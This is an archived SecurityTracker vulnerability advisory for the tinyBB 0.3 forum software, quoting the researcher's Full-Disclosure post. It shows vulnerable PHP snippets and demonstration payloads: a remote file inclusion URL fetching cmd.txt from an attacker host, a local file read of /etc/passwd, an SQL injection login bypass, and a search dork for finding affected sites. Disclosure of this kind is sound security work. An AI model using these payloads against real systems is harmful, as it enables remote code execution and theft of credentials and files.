SecurityTracker.com Archives - tinyBB Bugs Permit Cross-Site Scripting and SQL Injection Attacks and Let Remote Users Execute Arbitrary Code

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Forum/Board/Portal) > tinyBB

Vendors: epicdesigns.co.uk

tinyBB Bugs Permit Cross-Site Scripting and SQL Injection Attacks and Let Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1016172

SecurityTracker URL: http://securitytracker.com/id?1016172

CVE Reference: CVE-2006-2739 , CVE-2006-2740 , CVE-2006-2741 (Links to External Site)

Updated: Aug 25 2009

Original Entry Date: May 29 2006

Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Exploit Included: Yes

Version(s): 0.3 and prior versions

Description: A vulnerability was reported in tinyBB. A remote user can include and execute arbitrary code on the target system. A remote user can conduct cross-site scripting attacks. A remote user can inject SQL commands.

The 'footers.php' script does not properly validate user-supplied input. If registers_global is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[tBBPath]/foot ers.php?tinybb_footers=http://[attacker]/cmd.txt?

The 'forgot.php' and 'login.php' scripts do not properly validate user-supplied input. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. Other scripts and parameters are also affected.

A demonstration exploit URL is provided:

http://[target]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password= nothing

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the tinyBB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The vendor was notified on May 27, 2006.

A demonstration exploit is available at:

http://www.nukedx.com/?getxpl=33

Triginal advisory is available at:

http://www.nukedx.com/?viewdoc=33

Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI reported this vulnerability.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the tinyBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

Solution: No solution was available at the time of this entry.

Vendor URL: www.epicdesigns.co.uk/projects/tinybb.php (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Mustafa Can Bjorn IPEKCI <nukedx@nukedx.com>

Message History: None.

Source Message Contents

Date: Sun, 28 May 2006 16:57:23 +0300
From: Mustafa Can Bjorn IPEKCI <nukedx@nukedx.com>
Subject: [Full-disclosure] Advisory: tinyBB <= 0.3 Multiple Remote

 
--Security Report--
Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 05:37 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
 
---
Vendor: Epicdesigns (http://www.epicdesigns.co.uk/)
Version: 0.3 and prior versions must be affected.
About: Via this methods remote attacker can include arbitrary files to  
tinyBB.tinybb_footers variable in
footers.php did not sanitized before using it.You can find vulnerable  
code in footers.php at line 3
-Source in footers.php-
3: if (strlen($tinybb_footers) > 0) { require_once($tinybb_footers); }
-End of source-
Fixing this vulnerability so easy turn off register_globals.
There is also SQL injection in forgot.php.Parameter $q did not  
sanitized properly before using it on SQL query.
You can find vulnerable codes in forgot.php at lines 3-18.
-Source in forgot.php-
3: if (isset($q)) {
4: $sql="SELECT COUNT(*) FROM tinybb_members WHERE username='$q' OR  
email='$q'";
5: $count = mysql_result(mysql_query($sql),0);
.....
-End of source-
Also this can be caused to XSS.You can find vulnerable code in  
forgot.php at line 19-21
-Source in forgot.php-
19:  else {
20:    echo "<p>The query <b>$q</b> could not be .....
21:  }
-End of source-
There is another SQL injection in login.php.Parameters username and  
password did not sanitized properly before using
it on SQL query.You can find vulnerable codes in login.php at line 2-8
-Source in login.php-
8: $sql="SELECT count(*) FROM tinybb_members WHERE flag='1' AND  
username='$username' AND password='$password'";
-End of source-
I didnt wrote all vulnerabilities on tinyBB there is too many SQL  
injections and XSS vulnerabilities on this tiny
bulletin board.
Level: Highly Critical
---
How&Example:
Succesful exploitation needs allow_url_fopen set to 1 and register_globals on
GET -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript
EXAMPLE ->  
http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
If magic_quotes_gpc off remote attacker can include local files too
EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php
GET ->  
http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=33
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
---
Dorks: "Powered by tinyBB"


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2007, SecurityGlobal.net LLC